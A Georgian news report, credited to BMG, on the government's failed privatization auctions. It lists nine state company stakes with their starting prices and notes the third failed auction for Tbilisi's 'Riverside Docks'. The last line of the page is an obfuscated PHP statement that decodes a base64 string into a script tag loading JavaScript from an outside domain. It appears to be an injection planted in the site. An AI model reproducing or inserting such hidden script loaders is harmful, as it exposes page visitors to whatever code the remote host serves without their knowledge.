celsiusi
ავერსი საქკაბელი
პრივატიზაციის ახალი ტალღა, რომელიც მთავრობამ მარტის ბოლოს დაანონსა არასახარბიელო შედეგებით დაიწყო. დღეს უშედეგოდ დასრულდა 9 აუქციონი, რომლითაც მთავრობა მის საკუთრებაში არსებული კომპანიების წილების გაყიდვას ცდილობდა. ამ აუქციონების საერთო ფასი 9.9 მილიონი ლარი იყო.
 
დღესვე ჩავარდა 71.2-მილიონიანი აუქციონიც, რომლითაც მთავრობა თბილისის ცენტრში მდებარე ე.წ. “რიყის დოქების” გაყიდვას გეგმავდა, რაც ამ ობიექტის აუქციონის ჩავარდნის უკვე მესამე შემთხვევაა.
 
საპრივატიზაციოდ გამოტანილი კომპანიების სია და მათი საწყისი ფასი ასე ნაწილდებოდა:
 
1. შპს "ზუგდიდის ფარმაცია" (ს/ნ 219984596) 100% წილი; ობიექტის საწყისი ფასი 306,000 ლარი;
2. შპს ,,თბილისის N1 სტომატოლოგიური პოლიკლინიკა" (ს/ნ 204379074) 100% წილი; ობიექტის საწყისი ფასი 266,000 ლარი;
3. შპს ,,დეზინფექციის, დეზინსექციის დერატიზაციისა და სტერილიზაციის სპეციალიზირებული ეპიდზედამხედველობის ცენტრი" (ს/ნ: 211327410) 100% წილი; ობიექტის საწყისი ფასი 246,000 ლარი;
4. სს „ცეკავშირის ზუგდიდის სასურსათო კომბინატის“ (ს/კ 219983908) 51%-იანი წილი; ობიექტის საწყისი ფასი 1,014,000 ლარი;
5. შპს "საზღვაო ტექსერვისი" (ს/კ 245431206) 100% წილი; ობიექტის საწყისი ფასი 2,263,800 ლარი;
6. სს ,,ხაშურის მინის ტარა'' (ს/ნ: 243855734) კომპანიის კაპიტალის 23%-იანი წილი; ობიექტის საწყისი ფასი 747,200 ლარი;
7. შპს „დემეტრე 96“-ის (ს/ნ 205221614) 100%-იანი წილი; ობიექტის საწყისი ფასი 3,921,000 ლარი;
8. შპს „თერმული წყლები“ (ს/კ 404419214) 100%-იანი წილი; ობიექტის საწყისი ფასი 1,511,000 ლარი;
9. შპს უნიონი (ს/კ 225379587)20 % წილი. ობიექტის საწყისი ფასი 399,000 ლარი.
 
სახელმწიფო ქონების ეროვნული სააგენტოს მონაცემებით, გამოცხადებული იყო შპს ,,ჭიათურის ავტოსადგურის’’ 49%-იანი წილის აუქციონიც და ობიექტის საწყისი ფასი 1.66 მლნ ლარი იყო, თუმცა ეს აუქციონი სახელმწიფო ქონების სააგენტოს გადაწყვეტილებით შეწყდა.
 
წყარო: BMG
1843
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");